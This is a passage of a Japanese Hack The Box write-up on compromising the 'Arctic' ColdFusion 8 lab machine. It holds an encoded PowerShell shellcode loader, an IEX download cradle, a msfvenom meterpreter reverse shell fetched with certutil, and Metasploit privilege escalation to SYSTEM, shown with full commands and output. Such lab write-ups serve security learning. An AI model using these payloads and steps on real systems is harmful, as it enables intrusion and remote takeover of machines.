IABoAHoAWAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAbgBtAD0AJABuAG0ALgByAGUAcABsAGEAYwBlACgAIgBhAEMAcgAiACwAIAAiAEMAcgBlAGEAdABlAFQAaAByACIAKwAiAGUAIgArACIAYQBkACIAKQA7ACQAbgBtAD0AJABuAG0ALgByAGUAcABsAGEAYwBlACgAIgB5AG4AQQAiACwAIAAiAGMAYQBsAGwAbwBjACIAKQA7ACQAdABSAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AMABhACwAfQAwAGEALAB9ADAAYwAsAH0AYwAyACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQA3AGEALAB9ADYAOQAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYwAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADYALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADU'+'AOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AZQBlACwAfQBjADMAIgA7ACQATgBqAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABuAG0AIAAtAE4AYQBtAGUAIAAiAHkAUQAiACAALQBuAGEAbQBlAHMAIABKAGUAYgA7ACQATgBqAD0AJABOAGoALgByAGUAcABsAGEAYwBlACgAIgBKAGUAYgAiACwAIAAiAFcAaQBuADMAMgBGAHUAbgBjAHQAaQAiACsAIgBvACIAKwAiAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJAB0AFIAIAA9ACAAJAB0AFIALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAGUAQgBzAEwAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBlAEIAcwBMACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABUAEEAPQAwAHgAMQAwADAAMgA7AGkAZgAgACgAJAB0AFIALgBMACAALQBnAHQAIAAwAHgAMQAwADAAMgApAHsAJABUAEEAPQAkAHQAUgAuAEwAfQA7ACQAZwBCAD0AJABOAGoAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADIALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGgAegBYACAAPQAgADAAOwBmAG8AcgAoACQAcABpAD0AMAA7ACQAcABpACAALQBsAGUAKAAkAHQAUgAuAEwAZQBuAGcAdABoAC0AMQApADsAJABwAGkAKwArACkAewAkAE4AagA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGcAQgAuAFQAbwBJAG4AdAAzADIAKAApACsAJABwAGkAKQAsACAAJAB0AFIAWwAkAHAAaQBdACwAIAAxACkAfQA7ACQATgBqADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAGcAQgAsACAAMAB4ADEAMAAwADIALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGgAegBYACkAOwAkAE4AagA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAB4ADAAMAAsACQAZwBCACwAMAAsADAALAAwACkAOwAnADsAJABoAHUAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAG8AZwApACkAOwAkAFYASQA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABCAHYAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAcgBhAGMAIAA9ACAAIgBDADoAXAAkAEIAdgBcAHMAeQBzAHcAbwB3ADYANABcACQAQgB2ACQAVgBJAFwAdgAxAC4AMABcACQAVgBJACIAOwAkAEMAYQBVACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEMAYQBVACcAKQB7ACQAVgBJAD0AIAAkAHIAYQBjAH0AOwAkAFUAVgA9ACIAIAAkAFYASQAgAHEAUgBoACAAJABoAHUAIgA7ACQAVQBWAD0AJABVAFYALgByAGUAcABsAGEAYwBlACgAIgBxAFIAaAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAFUAVgA=')powershell_attack.txt からの変更点は
・一番後ろの " を抜く
・対応するはじめの方の " も抜く
・はじめの powershell /w 1 /C も抜く
です。
そして python で local サーバーを立てます。
$ python -m SimpleHTTPServerunicorn.rc を使って msfconsole も立てておきます。
$ msfconsole -r unicorn.rcそして先ほどのリバースシェルから exploit.html にアクセスしてその内容を実行します。
C:\ColdFusion8\runtime\bin> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/exploit.html')"しかし
これがまあ失敗するんですわ…
server は 200 でレスポンス返しているので、exploit.htmlがなんかミスってるか、unicorn の設定でミスったかなような気がするんですが、割としっかり目に見直しても原因がわかりませんでした…
作戦変更 → msfvenom を使う
msfvenom を使う
※ここから今まで LHOST=10.10.14.2 だったのが LHOST=10.10.14.13 に変わっています。
以下の writeup を参考にします。 Hack the Box Writeup: Arctic
kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=9090 -f exe > arctic.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...metaspoit で待ち受ける
kali@kali:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v5.0.71-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set lport 9090
lport => 9090
msf5 exploit(multi/handler) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf5 exploit(multi/handler) > exploit -j以下とったリバースシェルで
C:\ColdFusion8\runtime\bin>certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.
C:\ColdFusion8\runtime\bin>arctic.exe
arctic.exeこれでしばらくすると msfconsole で
[*] Meterpreter session 1 opened (10.10.14.13:9090 -> 10.10.10.11:49609) at 2020-02-19 10:40:51 -0500このように反応が帰ってきます。
meterpreter のチェック
ちゃんと動くかチェックします。
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > load stdapi
Loading extension stdapi...meterpreter >
meterpreter > sysinfo
Computer : ARCTIC
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
Computer : ARCTIC
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: ARCTIC\tolis
Server username: ARCTIC\tolis完璧です
ここで Architecture は x64 になっているのに対し、Meterpreter は x86/windows となっていることに気がつきます。 これを揃えます。
プロセスを乗り移る
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
236 4 smss.exe
328 308 csrss.exe
336 484 svchost.exe
372 308 wininit.exe
392 380 csrss.exe
436 380 winlogon.exe
484 372 services.exe
500 372 lsass.exe
508 372 lsm.exe
608 484 svchost.exe
680 484 svchost.exe
756 436 LogonUI.exe
764 484 svchost.exe
804 484 svchost.exe
840 484 spoolsv.exe
852 484 svchost.exe
908 484 svchost.exe
924 1832 arctic.exe x86 0 ARCTIC\tolis C:\ColdFusion8\runtime\bin\arctic.exe
948 484 svchost.exe
1048 484 CF8DotNetsvc.exe
1092 1048 JNBDotNetSide.exe
1100 328 conhost.exe
1120 328 conhost.exe
1136 1312 k2server.exe
1148 484 jrunsvc.exe x64 0 ARCTIC\tolis C:\ColdFusion8\runtime\bin\jrunsvc.exe
1176 1148 jrun.exe x64 0 ARCTIC\tolis C:\ColdFusion8\runtime\bin\jrun.exe
1184 484 swagent.exe
1192 328 conhost.exe x64 0 ARCTIC\tolis C:\Windows\System32\conhost.exe
1224 484 swstrtr.exe
1236 1224 swsoc.exe
1244 328 conhost.exe
1312 484 k2admin.exe
1424 608 WmiPrvSE.exe
1456 484 svchost.exe
1512 484 VGAuthService.exe
1752 484 vmtoolsd.exe
1776 484 ManagementAgentHost.exe
1832 1176 cmd.exe x64 0 ARCTIC\tolis C:\Windows\System32\cmd.exe
2092 1312 k2index.exe
2116 328 conhost.exe
3068 484 svchost.exe
3144 484 dllhost.exe
3304 484 msdtc.exe
3384 328 conhost.exe x64 0 ARCTIC\tolis C:\Windows\System32\conhost.exe
3928 484 sppsvc.exejrunsvc.exeに乗り移ります。
meterpreter > migrate 1148
[*] Migrating from 924 to 1148...
[*] Migration completed successfully.ps コマンド、migrate コマンドについて
ps プロセスの一覧を取得
migrate アクティブなプロセスに移動します。The Ultimate Command Cheat Sheet for Metasploit’s Meterpreter Metasploit Post-Exploitation
suggester を使う
suggester は この exploit 使えるんじゃね? みたいなのを調べてくれます
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 13 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completedsuggester がおすすめしてくれたやつを実行
今回は exploit/windows/local/ms10092schelevator を使用します。 (色んな writeup で使われていたので)(a fairly common and reliable one らしいです)
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf5 exploit(windows/local/ms10_092_schelevator) > set lhost 10.10.14.13
msf5 exploit(windows/local/ms10_092_schelevator) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\saaKbk.exe
[*] Creating task: 1uBDeH8S
[*] SUCCESS: The scheduled task "1uBDeH8S" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\1uBDeH8S...
[*] Original CRC32: 0xffb3d93d
[*] Final CRC32: 0xffb3d93d
[*] Writing our modified content back...
[*] Validating task: 1uBDeH8S
[*]
[*] Folder: \
[*] TaskName Next Run Time Status
[*] ======================================== ====================== ===============
[*] 1uBDeH8S 1/3/2020 3:56:00 �� Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "1uBDeH8S" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "1uBDeH8S" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (180291 bytes) to 10.10.10.11
[*] SUCCESS: Attempted to run the scheduled task "1uBDeH8S".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.13:4444 -> 10.10.10.11:50110) at 2020-02-19 12:58:37 -0500
[*] SUCCESS: The scheduled task "1uBDeH8S" was successfully deleted.
[*] SCHELEVATOR
meterpreter >root.txt をとる
meterpreter > pwd
C:\Windows\system32
meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>more c:\\users\\administrator\\desktop\\root.txtこれで root.txt の内容が取れます!
終わりに
ちなみに user.txt をとり忘れていたのですが、似たような方法で取得できるので割愛します。
ひとつの machine 攻略でここまで多くのことを学べるとは思っていませんでした。これから精進していきます。
訂正やアドバイスなどがあればコメントか Twitter にお願いします! さんぽし(@sanpo_shiho) | Twitter
